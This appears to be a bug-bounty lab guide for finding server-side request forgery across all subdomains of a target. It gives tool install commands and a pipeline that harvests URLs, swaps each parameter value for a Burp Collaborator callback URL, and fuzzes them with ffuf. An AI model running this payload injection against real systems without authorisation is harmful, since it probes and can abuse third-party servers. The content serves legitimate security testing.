Finding SSRF (all scope)

The goal of this laboratory is to use some tools to collect all subdomains from a specific domain, all the URLs and parameters, and retrieve some results using the burp collaborator utility.

Tools

subfinder - subdomain discovery.

How to install it:

GO111MODULE=on go get -v github.com/projectdiscovery/subfinder/v2/cmd/subfinder

qsreplace - Accept URLs on stdin, replace all query string values with a user-supplied value.

How to install it:

go get -u github.com/tomnomnom/qsreplace

gau: Fetch known URLs from AlienVault's Open Threat Exchange, the Wayback Machine, and Common Crawl.

How to install it:

GO111MODULE=on go get -u -v github.com/lc/gau

waybackurls: Fetch all the URLs that the Wayback Machine knows about for a domain.

How to install it:

go get github.com/tomnomnom/waybackurls

gf: A wrapper around grep, to help you grep for things.

How to install it:

go get -u github.com/tomnomnom/gf

List to exclude:

grep -v "\.css?ver" | grep -v "\.js" | grep -v "\.png" | grep -v "\.woff" | grep "collaborator"

ffuf: Fast web fuzzer written in Go.

How to install it:

go get -u github.com/ffuf/ffuf

Scope

In Scope: *.example.com

Harvester

gau -subs example.com; subfinder -d example.com -silent | waybackurls | sort -u > output.txt

Replacing params

cat output.txt | qsreplace "http://xxxxxxxxxxx.burpcollaborator.net" >> fuzz_list.txt

Fuzzing and test

ffuf -c -w fuzz_list.txt -u FUZZ -t 200 -r

Resources

To collect all URLs from several sources:

Last updated